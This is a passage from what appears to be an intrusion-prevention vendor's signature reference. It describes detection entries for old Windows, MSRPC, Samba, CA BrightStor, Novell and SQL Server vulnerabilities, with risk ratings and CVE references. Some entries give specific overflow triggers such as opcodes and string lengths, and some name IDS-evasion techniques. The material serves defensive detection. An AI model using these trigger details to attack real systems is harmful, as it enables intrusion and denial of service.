A vulnerability in Internet Explorer

Situation:

File-Text_MSIE-JSON-Array-Information-Disclosure-Vulnerability

References:

CVE-2013-1279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1279

MS13-037
http://technet.microsoft.com/security/bulletin/MS13-037

MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer

Situation:

HTTP_CS-MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861

References:

CVE-2013-3861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3861

MS13-082
http://technet.microsoft.com/security/bulletin/MS13-082

MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-536-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193

References:

CVE-2013-3193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3193

MS13-059
http://technet.microsoft.com/security/bulletin/MS13-059

MSN-Messenger-Usage

About this vulnerability:	MSN Messenger usage
Risk:	Moderate
First detected in:	sgpkg-ips-12-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MSN Messenger
Type:	Peer-to-Peer
Description:	MSN Messenger is a peer-to-peer network client that can be used to send messages and share files among users.
Situation:	HTTP_CS-MSN-Login HTTP_CSH-MSN-Live-Messenger-Over-HTTP IM-TCP_MSN-Login IM-TCP_MSN-Login-Reply IM-TCP_MSN-P2P-File-Transfer

MSN-WebMessenger-Usage

About this vulnerability:	MSN WebMessenger usage
Risk:	Moderate
First detected in:	sgpkg-ips-128-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MSN Messenger
Type:	Instant Messenger
Description:	MSN WebMessenger is a web service which allows users to connect to other MSN Messenger users through a web interface.

MSRPC-Big-Endian-Byte-Order-Used

About this vulnerability:	MSRPC traffic using big endian byte order detected, possible IDS evasion attempt
Risk:	Moderate
First detected in:	sgpkg-ips-104-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	The MSRPC protocol allows both little endian and big endian byte order to be used. Normal MSRPC traffic does not usually contain requests using big endian byte order but such requests may be used by attackers in IDS evasion attempts.
Situation:	Generic_UDP-MSRPC-Big-Endian-Byte-Order-Used MSRPC-UDP_Big-Endian-Byte-Order-Used MSRPC-TCP_CPS-Big-Endian-Byte-Order-Used Generic_CS-MSRPC-Big-Endian-Byte-Order-Used

MSRPC-Bind-Over-SMB2

About this vulnerability:	An MSRPC bind request over SMB was detected
Risk:	Moderate
First detected in:	sgpkg-ips-427-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An MSRPC bind request over SMB was detected
Situation:	SMB-TCP_CS-MSRPC-Bind-Over-SMB2

MSRPC-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Computer Associates Alert Notification Server

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor; Computer Associates Protection Suite 3; Computer Associates Threat Manager for the Enterprise

Type:

Buffer Overflow

Description:

Computer Associates Alert Notification Server has a stack-based buffer overflow vulnerability. A remote attacker can send a malformed RPC request with an excessively long Conformant String to an affected host to cause a DoS or compromise the vulnerable system.

Situation:

MSRPC-TCP_CPS-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow

References:

CVE-2007-3825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3825

BID-24947
http://www.securityfocus.com/bid/24947

MSRPC-CA-Message-Engine-RPC-Server-Buffer-Overflow

About this vulnerability:

MSRPC Computer Associates Message Engine RPC server buffer overflow

Risk:

High

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

Computer Associates BrightStor; Computer Associates Business Protection Suite; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2

Type:

Buffer Overflow

Description:

The Message Engine component in Computer Associates BrightStor and Business Protection Suite products suffers from a buffer overflow vulnerability. An RPC request with opnum 43 and an argument string longer than 680 bytes will overflow a buffer, potentially allowing arbitrary code execution. The Message Engine runs with System level privileges by default.

Situation:

MSRPC-TCP_CPS-CA-Message-Engine-RPC-Server-Buffer-Overflow

References:

CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143

BID-20365
http://www.securityfocus.com/bid/20365

MSRPC-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow

About this vulnerability:

Computer Associates Message Engine stack-based buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2

Type:

Buffer Overflow

Description:

Computer Associates Message Engine suffers from a stack-based buffer overflow vulnerability. An RPC request with opnum 45 and an invalid index value can cause a buffer overflow condition, allowing arbitrary code execution. The Message Engine runs with System level privileges by default.

Situation:

MSRPC-TCP_CPS-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow

References:

CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143

BID-20365
http://www.securityfocus.com/bid/20365

MSRPC-Encryption-Usage

About this vulnerability:	MSRPC encryption may be used by attackers to hide exploits and avoid detection
Risk:	Moderate
First detected in:	sgpkg-ips-96-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	The MSRPC protocol allows connections to be encrypted. This feature may also be used by attackers to hide attacks and avoid detection.
Situation:	MSRPC-TCP_Encryption-Usage

MSRPC-LSASS-DOS-MS09-059

About this vulnerability:

Denial of service vulnerability in MSRPC NTLMSSP authentication

Risk:

Low

First detected in:

sgpkg-ips-258-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability exists in the Microsoft Windows Local Security Authority Subsystem Service (LSASS). The vulnerability is due to insufficient validation when handling specially crafted NTLM authentication packets. Remote attackers could exploit this vulnerability by sending a specially crafted network message to a computer running the Server service. Successful exploitation would result in a read access violation error on the host, which leads to a system wide denial of service condition.

Situation:

MSRPC-TCP_NTLMSSP-Authentication-Null-Session-Denial-Of-Service

References:

CVE-2009-2524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2524

BID-36593
http://www.securityfocus.com/bid/36593

MS09-059
http://technet.microsoft.com/security/bulletin/MS09-059

MSRPC-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow

About this vulnerability:

A buffer overflow in the Microsoft Message Queuing Service

Risk:

Moderate

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4;Windows XP SP2;Windows 2000 Server

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Message Queuing (MSMQ) Service suffers from a buffer overflow vulnerability in the handling of long queue names. Remote attackers can exploit the vulnerability via an unauthenticated MSRPC request containing a malicious message queue name, and potentially execute arbitrary code on the vulnerable host.

Situation:

MSRPC-TCP_CPS-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow

References:

CVE-2007-3039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039

BID-26797
http://www.securityfocus.com/bid/26797

MS07-065
http://technet.microsoft.com/security/bulletin/MS07-065

MSRPC-Microsoft-Client-Service-For-NetWare-Memory-Corruption

About this vulnerability:

Buffer overflow vulnerability in the Microsoft Client Service for NetWare

Risk:

Critical

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Client Service for NetWare has a stack-based buffer overflow vulnerability. By sending a malformed RPC request to an affected system a remote attacker can cause a DoS or execute arbitrary code with the privileges of the vulnerable service, normally System.

Situation:

MSRPC-TCP_CPS-Microsoft-Client-Service-For-NetWare-Memory-Corruption

References:

CVE-2006-4688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4688

BID-20984
http://www.securityfocus.com/bid/20984

OSVDB-30260
http://www.osvdb.org/30260

MS06-066
http://technet.microsoft.com/security/bulletin/MS06-066

MSRPC-Microsoft-Windows-RRAS-Memory-Corruption

About this vulnerability:

Buffer overflow vulnerability in Microsoft RRAS service

Risk:

Critical

First detected in:

sgpkg-ips-71-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Routing and Remote Access service has a buffer overflow vulnerability in the handling of the ServiceRequest function. A parameter passed to the function is copied into a 16-byte buffer without sufficient boundary checking allowing a malicious remote attacker to overrun the buffer and cause a DoS condition or execute arbitrary code with the privileges of the vulnerable service, normally SYSTEM.

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-RRAS-Memory-Corruption
MSRPC-TCP_CPS-Microsoft-Windows-RRAS-Memory-Corruption-2

References:

CVE-2006-2370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370

BID-18325
http://www.securityfocus.com/bid/18325

OSVDB-26437
http://www.osvdb.org/26437

MS06-025
http://technet.microsoft.com/security/bulletin/MS06-025

MSRPC-Microsoft-Windows-Server-Service-Buffer-Overrun

About this vulnerability:

Buffer overflow vulnerability in Microsoft Server service

Risk:

Critical

First detected in:

sgpkg-ips-75-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Server service has a buffer overflow vulnerability. By sending specially crafted packets to an affected system a remote attacker can cause a denial of service condition or take complete control of the system.

Situation:

HTTP_CSU-Mocbot-Traffic
MSRPC-TCP_CPS-Microsoft-Windows-Server-Service-Buffer-Overrun
MSRPC-TCP_CPS-Vulnerable-Microsoft-Windows-Server-Service-Function-Called

References:

CVE-2006-3439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439

BID-19409
http://www.securityfocus.com/bid/19409

MS06-040
http://technet.microsoft.com/security/bulletin/MS06-040

MSRPC-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption

About this vulnerability:	Memory corruption vulnerability in Microsoft Windows
Risk:	High
First detected in:	sgpkg-ips-100-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 2000
Software:	<os>
Type:	Malfunction
Description:	There is a memory corruption vulnerability in Microsoft Windows. By sending a crafted ChangeServiceConfig2A request, a remote authenticated attacker can cause a denial of service condition that leads to a system reboot, or possibly execute arbitrary code on the target system.
Situation:	MSRPC-TCP_CPS-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption

MSRPC-NetrSendMessage-Usage

About this vulnerability:	NetrSendMessage MS-RPC interface usage
Risk:	Low
First detected in:	sgpkg-ips-65-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	NetrSendMessage is an MS-RPC operation used to send pop-up messages across a network. These messages are primarily used to send spam to arbitrary hosts on the Internet. The function can be called via a single UDP package, allowing spoofed source IP addressess to be used.
Situation:	Generic_Windows-Messenger-Service-NetrSendMessage-Usage

MSRPC-Novell-Client-nwspool.dll-EnumPrinters-Function-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell Client for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-147-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell Client

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell Client for Windows. A remote unauthenticated attacker can send a malformed EnumPrinters RPC request to cause a denial of service or execute arbitrary code on the affected host with System-level privileges.

Situation:

MSRPC-TCP_CPS-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow

References:

CVE-2008-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0639

BID-27741
http://www.securityfocus.com/bid/27741

OSVDB-41510
http://www.osvdb.org/41510

MSRPC-Novell-Client-Print-Provider-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Novell Client Print Provider module

Risk:

High

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell Client

Type:

Buffer Overflow

Description:

Novell Client has a stack-based buffer overflow vulnerability. A remote attacker can send a malformed RPC request to an affected host to cause a DoS or compromise the vulnerable system.

Situation:

MSRPC-TCP_CPS-Novell-Client-Print-Provider-Buffer-Overflow

References:

CVE-2006-6114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6114

BID-21220
http://www.securityfocus.com/bid/21220

OSVDB-30547
http://www.osvdb.org/30547

MSRPC-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell Client for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell Client

Type:

Buffer Overflow

Description:

Novell Client for Windows has a stack-based buffer overflow vulnerability. A remote attacker can send a malformed EnumPrinters RPC request to an affected host to cause a denial of service or compromise the vulnerable system.

Situation:

MSRPC-TCP_CPS-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow

References:

BID-25092
http://www.securityfocus.com/bid/25092

MSRPC-NTLMSSP-Authentication-Null-Session-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in MSRPC NTLMSSP authentication

Risk:

Low

First detected in:

sgpkg-ips-125-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Microsoft MSRPC service has an integer overflow vulnerability that can be triggered via the NTLMSSP authentication method. A specially crafted MSRPC connection where a NULL session is first established with NTLMSSP authentication and later used with a crafted authentication level may result in crashing a vulnerable Windows host. The vulnerability can be exploited by unauthenticated remote attackers.

Situation:

MSRPC-TCP_NTLMSSP-Authentication-Null-Session-Denial-Of-Service

References:

CVE-2007-2228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2228

BID-27134
http://www.securityfocus.com/bid/27134

MS07-058
http://technet.microsoft.com/security/bulletin/MS07-058

MSRPC-PnP-GetDeviceList-And-GetDeviceListSize-BOF

About this vulnerability:

Buffer overflow vulnerability in Plug and Play service GetDeviceList and GetDeviceListSize

Risk:

Critical

First detected in:

sgpkg-ips-41-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

UPnP

Type:

Buffer Overflow

Description:

Microsoft Windows Plug and Play service suffers from a buffer overflow vulnerability. Two methods provided by the RPC interface (GetDeviceList and GetDeviceListSize) accept a user-supplied string that is copied into a fixed size buffer without sufficient boundary checking. If the user-supplied string contains a large amount of consecutive backslashes (\), the destination buffer may be overrun. A successful attack allows the remote attacker to execute arbitrary code with SYSTEM privileges on the vulnerable host.

Situation:

MSRPC-TCP_CPS-PnP-GetDeviceList-And-GetDeviceListSize-BOF
MSRPC-TCP_CPS-PnP-GetDeviceList-DoS

References:

CVE-2005-2120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2120

BID-15065
http://www.securityfocus.com/bid/15065

OSVDB-18830
http://www.osvdb.org/18830

MS05-047
http://technet.microsoft.com/security/bulletin/MS05-047

MSRPC-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in PNP interface

Risk:

High

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Windows Plug and Play service suffers from a buffer overflow vulnerability. The PNP_GetDeviceList function can be exploited by specifying a large output buffer size to cause a denial of service. There is also an alternate attack vector for the same vulnerability via a function call in the SRVSVC interface.

Situation:

MSRPC-TCP_CPS-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service
MSRPC-TCP_CPS-PnP-Denial-Of-Service-Via-SRVSVC-NetrDfsCreateExitPoint

References:

CVE-2005-3644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3644

BID-15460
http://www.securityfocus.com/bid/15460

MSRPC-Rpcss-RemoteCreateInstance-Race-DoS

About this vulnerability:

Multi-threaded race condition in processing incoming RPC requests.

Risk:

Critical

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A multi-threaded race condition in the processing of incoming RPC requests in various Windows operating systems may allow remote attackers to trigger a denial of service condition or execute arbitrary code on a vulnerable host. The race condition occurs when two threads process the same request, which leads to memory corruption.

Situation:

MSRPC-TCP_CPS-Rpcss-RemoteCreateInstance-Race-DoS

References:

CVE-2003-0813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0813

BID-8811
http://www.securityfocus.com/bid/8811

MS04-012
http://technet.microsoft.com/security/bulletin/MS04-012

MSRPC-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Samba LSA interface

Risk:

Moderate

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Buffer Overflow

Description:

Certain versions of Samba suffer from a vulnerability in the Local Security Authority (LSA) component. A specially crafted LsarAddPrivilegesToAccount request to the LSA interface can cause a buffer overflow, allowing remote attackers to execute arbitrary code. Authentication is required to access the interface.

Situation:

MSRPC-TCP_CPS-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

BID-23973
http://www.securityfocus.com/bid/23973

OSVDB-34732
http://www.osvdb.org/34732

MSRPC-Samba-LSA-LsarLookupSids-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Samba LSA interface

Risk:

Moderate

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Samba

Type:

Buffer Overflow

Description:

Certain versions of Samba suffer from a vulnerability in the Local Security Authority (LSA) component. A specially crafted LsarLookupSids request to the LSA interface can cause a buffer overflow, allowing remote attackers to execute arbitrary code. Authentication is required to access the interface.

Situation:

MSRPC-TCP_CPS-Samba-LSA-LsarLookupSids-Buffer-Overflow

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

BID-23973
http://www.securityfocus.com/bid/23973

OSVDB-34732
http://www.osvdb.org/34732

MSRPC-Small-Fragments-Used

About this vulnerability:	MSRPC traffic fragmented into small packets detected
Risk:	Moderate
First detected in:	sgpkg-ips-96-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	The MSRPC protocol allows payload fragmentation. The usage of small fragments is unusual, and can be used by attackers to disguise exploits and evade detection.
Situation:	Generic_UDP-MSRPC-Small-Fragments-Used MSRPC-TCP_Small-Fragments-Used Generic_CS-MSRPC-Small-Fragments-Used

MSRPC-Windows-Local-Security-Authority-Username-Disclosure

About this vulnerability:	Windows LSA MSRPC service can be used to obtain valid usernames from a host
Risk:	Low
First detected in:	sgpkg-ips-126-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	Microsoft Windows LSA MSRPC service can be used to obtain a list of valid usernames for a host. The service should not be accessible without authentication to all users, as a list of valid usernames can be used in subsequent attacks, for example in bruteforcing account passwords.
Situation:	MSRPC-TCP_CPS-Windows-Local-Security-Authority-Username-Disclosure

MSRPC-Workstation-Service-Account-Name-Buffer-Overflow

About this vulnerability:

MSRPC Workstation Service Account Name Buffer Overflow detected

Risk:

Moderate

First detected in:

sgpkg-ips-507-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP

Software:

<os>

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in the Microsoft Windows Workstation service. The vulnerability is caused by the incorrect processing of long arguments in specially crafted RPC calls. A remote attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, which is normally System.

References:

CVE-2006-4691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4691

BID-20985
http://www.securityfocus.com/bid/20985

MS06-070
http://technet.microsoft.com/security/bulletin/MS06-070

MSRPC-Workstation-Service-Buffer-Overflow-MS06-070

About this vulnerability:

MSRPC Workstation Service Buffer Overflow MS06-070

Risk:

High

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP

Software:

<os>

Type:

Buffer Overflow

Description:

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-BOF-MS06-070-2
MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-BOF-MS06-070

References:

CVE-2006-4691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4691

BID-20985
http://www.securityfocus.com/bid/20985

MS06-070
http://technet.microsoft.com/security/bulletin/MS06-070

MSRPC_CA-Arcserve-Backup-Db-Engine-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Computer Associates BrightStor ARCserve Backup DB Engine

Risk:

Moderate

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Malfunction

Description:

There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup DB Engine. The vulnerability is due to insufficient memory initialization and is exploitable by sending a crafted message to the vulnerable server. No authentication is required to exploit this vulnerability.

Situation:

MSRPC-TCP_CPS-CA-Arcserve-Backup-Db-Engine-Denial-Of-Service

References:

CVE-2008-4399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4399

BID-31684
http://www.securityfocus.com/bid/31684

MSRPC_CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine service

Risk:

Moderate

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Malfunction

Description:

There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine service. The vulnerability is due to insufficient input validation in the ClientCreateJobHandle library function and can be exploited by sending a crafted DCE-RPC request to the vulnerable server. No authentication is required to exploit this vulnerability.

Situation:

MSRPC-TCP_CPS-CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service

References:

CVE-2008-4398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4398

BID-31684
http://www.securityfocus.com/bid/31684

MSRPC_CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow

About this vulnerability:

A stack based buffer overflow vulnerability in CA BrightStor Backup Message Engine MSRPC interface

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

The MSRPC interface for Message Engine in Computer Associates BrightStor suffers from a stack based buffer overflow vulnerability. A crafted request with opnum 0x10d containing a long string can be used by remote attackers to execute arbitrary code on a vulnerable server. No authentication is required to exploit this vulnerability.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow

References:

CVE-2007-5327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5327

BID-26015
http://www.securityfocus.com/bid/26015

MSRPC_CA-BrightStor-Backup-Tape-Engine-Message-Vsprintf-Log-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in CA BrightStor Backup Tape Engine interface

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

The MSRPC interface for Tape Engine in Computer Associates BrightStor contains a vulnerable function with opnum 38. A crafted request to the affected function containing a crafted long string will be passed to the vsprintf function without sufficient boundary checks, resulting in a buffer overflow. Remote attackers can exploit the vulnerability with a crafted MSRPC request to execute arbitrary code with SYSTEM privileges on a vulnerable host.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Backup-Tape-Engine-Vsprintf-Log-Buffer-Overflow

References:

CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169

BID-22006
http://www.securityfocus.com/bid/22006

BID-22005
http://www.securityfocus.com/bid/22005

OSVDB-31327
http://www.osvdb.org/31327

MSRPC_CA-BrightStor-Backup-Tape-Engine-Opcode-191-Code-Execution-Vulnerability

About this vulnerability:

An input validation vulnerability that allows remote code execution in CA BrightStor Tape Engine

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1554-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Input Validation

Description:

The MSRPC interface for Tape Engine in Computer Associates BrightStor contains a vulnerable function with opnum 191. The function accepts a memory pointer as its argument and treats it as a base pointer for a data structure which contains a function pointer. The function pointer is followed without validating the base address supplied remotely, allowing remote attackers to execute arbitrary code by passing a crafted pointer value. No authentication is required to exploit this vulnerability.

Situation:

MSRPC-TCP_CPS-CA-BrightStor-Backup-Tape-Engine-Opcode-191-Function-Access

References:

CVE-2007-0168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0168

BID-22010
http://www.securityfocus.com/bid/22010

OSVDB-31327
http://www.osvdb.org/31327

MSRPC_CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in the Alert Service component used by multiple Computer Associates products

Risk:

Moderate

First detected in:

sgpkg-ips-152-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Anti-Virus for the Enterprise; Computer Associates Threat Manager for the Enterprise

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Alert Service component used by multiple Computer Associates products. An attacker with valid credentials can send a malicious RPC request with an excessively long Conformant string to cause a denial of service terminating the Computer Associates Alert Notification Server or execute arbitrary code with System privileges on the target host.

Situation:

MSRPC-TCP_CPS-CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow

References:

CVE-2007-4620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4620

BID-28605
http://www.securityfocus.com/bid/28605

OSVDB-44040
http://www.osvdb.org/44040

MSSQL-MS-SQL-Server-Pre-Authentication-BOF

About this vulnerability:

Buffer overflow in the authentication function for Microsoft SQL Server

Risk:

High

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000

Software:

Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process.

Situation:

MSSQL_MS-SQL-Server-Pre-Authentication-BOF
MSSQL_MS-SQL-Server-Pre-Authentication-BOF-2
Shared_MS-SQL-Server-Pre-Authentication-Buffer-Overflow

References:

CVE-2002-1123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1123

BID-5411
http://www.securityfocus.com/bid/5411

MS02-056
http://technet.microsoft.com/security/bulletin/MS02-056

MSSQL-MS-SQL-Server-Sp_replwritetovarbin-BOF

About this vulnerability:

Buffer overflow in the sp_replwritetovarbin function for Microsoft SQL Server

Risk:

High

First detected in:

sgpkg-ips-204-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 2000; Microsoft SQL Server 2005

Type:

Buffer Overflow

Description:

There exists a buffer overflow in Microsoft SQL Server. The vulnerability is due uninitialized variables as parameters when calling the extended stored procedure sp_replwritetovarbin. A remote authenticated attacker can exploit this vulnerability by sending a specially T-SQL script to the target server, potentially causing arbitrary code injection and execution with the privileges of the affected process. In an attack case where code injection is not successful, the SQL Server process will terminate. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the SQL server process.

Situation:

SMB-TCP_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow
MSSQL_Microsoft-SQL-Server-Spreplwritetovarbin-Buffer Overflow

References:

CVE-2008-5416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416

BID-32710
http://www.securityfocus.com/bid/32710

OSVDB-50917
http://www.osvdb.org/50917

MS09-004
http://technet.microsoft.com/security/bulletin/MS09-004

MSSQL-NetBIOS-MS-SQL-Server-Xp-Displayparamstmt-BOF

About this vulnerability:

Buffer overflow using procedure xp_displayparamstmt in Microsoft SQL Server (MS00-092)

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 7.0; Microsoft SQL Server 2000

Type:

Buffer Overflow

Description:

Microsoft SQL Server has a buffer overflow vulnerability in the srv_paraminfo() API, which is used by the Extended Stored Procedures (e.g. xp_displayparamstmt) to parse input parameters. An attacker who is able to log on to the SQL Server can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

